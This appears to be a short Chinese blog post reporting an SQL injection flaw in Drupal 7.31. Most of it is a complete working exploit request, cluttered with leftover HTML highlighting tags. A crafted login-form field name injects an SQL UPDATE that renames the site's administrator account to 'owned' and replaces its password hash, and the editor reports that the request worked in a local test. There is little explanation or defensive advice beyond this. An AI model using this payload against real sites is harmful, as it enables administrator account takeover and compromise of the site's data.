今早有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用的EXP代码,小编在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。测试代码

<span class="pln">POST </span><span class="pun">/</span><span class="pln">drupal</span><span class="pun">-</span><span class="lit">7.31</span><span class="pun">/?</span><span class="pln">q</span><span class="pun">=</span><span class="pln">node</span><span class="pun">&amp;</span><span class="pln">destination</span><span class="pun">=</span><span class="pln">node HTTP</span><span class="pun">/</span><span class="lit">1.1</span>
<span class="typ">Host</span><span class="pun">:</span><span class="pln"> </span><span class="lit">127.0</span><span class="pun">.</span><span class="lit">0.1</span>
<span class="typ">User</span><span class="pun">-</span><span class="typ">Agent</span><span class="pun">:</span><span class="pln"> </span><span class="typ">Mozilla</span><span class="pun">/</span><span class="lit">5.0</span><span class="pln"> </span><span class="pun">(</span><span class="pln">X11</span><span class="pun">;</span><span class="pln"> </span><span class="typ">Ubuntu</span><span class="pun">;</span><span class="pln"> </span><span class="typ">Linux</span><span class="pln"> x86_64</span><span class="pun">;</span><span class="pln"> rv</span><span class="pun">:</span><span class="lit">28.0</span><span class="pun">)</span><span class="pln"> </span><span class="typ">Gecko</span><span class="pun">/</span><span class="lit">20100101</span><span class="pln"> </span><span class="typ">Firefox</span><span class="pun">/</span><span class="lit">28.0</span>
<span class="typ">Accept</span><span class="pun">:</span><span class="pln"> text</span><span class="pun">/</span><span class="pln">html</span><span class="pun">,</span><span class="pln">application</span><span class="pun">/</span><span class="pln">xhtml</span><span class="pun">+</span><span class="pln">xml</span><span class="pun">,</span><span class="pln">application</span><span class="pun">/</span><span class="pln">xml</span><span class="pun">;</span><span class="pln">q</span><span class="pun">=</span><span class="lit">0.9</span><span class="pun">,*</span><span class="com">/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/drupal-7.31/
Cookie: Drupal.toolbar.collapsed=0; Drupal.tableDrag.showWeight=0; has_js=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&amp;name[0]=test&amp;pass=shit2&amp;test2=test&amp;form_build_id=&amp;form_id=user_login_block&amp;op=Log+in</span>

1413424230142

 

14134242627843

 

参考:http://www.freebuf.com/vuls/47271.html

声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。